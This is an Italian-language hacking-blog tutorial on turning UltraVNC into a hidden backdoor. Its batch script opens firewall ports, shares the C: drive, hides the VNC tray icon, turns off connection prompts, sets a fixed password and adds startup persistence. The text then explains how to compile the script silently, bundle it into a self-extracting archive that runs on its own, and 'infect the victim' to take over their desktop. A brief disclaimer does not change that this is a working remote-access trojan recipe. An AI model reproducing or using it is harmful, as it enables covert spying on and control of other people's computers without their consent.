Che cos’è ULTRAVNC?
UltraVNC è un’applicazione in grado di stabilire una connessione tra due o più PC permettendo non soltanto di vedere una riproduzione esatta del desktop, ma anche di controllare completamente il PC su cui è stato installato VNC server. Tutto ciò è possibile grazie all’utilizzo del protocollo VNC (Virtual Network Computing), una tecnologia sviluppata per il cosiddetto desktop sharing: questa funzione prevede la presenza di una parte destinata a fare lo streaming dei dati (server) e di una per la riproduzione del flusso di dati (client); ovviamente la parte server dovrà essere installata sul PC che si desidera monitorare, mentre quella client andrà posizionata sul sistema di controllo.
GUIDA A SCOPO PURAMENTE INFORMATIVO. NON MI ASSUMO NESSUNA RESPONSABILITA’ DI CIO’ CHE NE FARETE: (Autori della guida “CrAsHer_90″ e “N3T”)
Accesso in remoto tramite il noto programma VNC. Prima di tutto scaricate ULTRAVNC Download
dopo averlo installato aprite il blocco note ed inserite il codice che segue:
===============================================================================
@echo off
netsh firewall add portopening TCP 5900 PORTAWEB
netsh firewall add portopening TCP 139 PORTAWEB
net share disco=C:\
netsh firewall add allowedprogram program= C:\winvnc.exe name= mqdsmode=enablescope=all profile=all
@echo off
REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v BlackAlphaBlending /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v BlankMonitorEnable /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v CaptureAlphaBlending /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v DefaultScale /t REG_DWORD /d 1 /f
REG ADD HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v FileTransferEnable /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v FTUserImpersonation /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v HTTPConnect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Idle Timeout /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v LocalInputDisabled /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v LockSetting /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d F3268FE776CDFF8A /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v QueryAccept /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v QuerySetting /t REG_DWORD /d 2 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v UseDSMPlugin /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v XDMCPConnect /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t REG_SZ /d "C:\winvnc.exe"
@start c:\winvnc.exe
exit
===================================================================================
Adesso salvatelo con estensione .bat (come potete notare nel codice batch ho messo pure il comando per aprire la porta 139 e per condividere il disco C:\) potete compilare il codice batch in modalità “Ghost” con Quick Batch File Compiler . Fatto ciò andate su Risorse del computer<C:\<Programmi<ultravnc e prelevate “winvnc.exe” (server del vnc) mettetelo nel desktop assieme al file.bat (o file.exe se l’avete compilato in modalità ghost). Ora metteteli in un archivio AUTOESTRAENTE che dovrà estrarre i file in C:\ e che dovrà lanciare in automatico il file.bat e di conseguenza lancerà il server. (@start C:\winvnc.exe)
una volta infettata la vittima con l’exe creato… aprite il client (vncviewer) inserite l’ip e godetevi il desktop remoto 
Guida: By “CrAsHeR_90″ e “N3T”
Postato in: Hacking
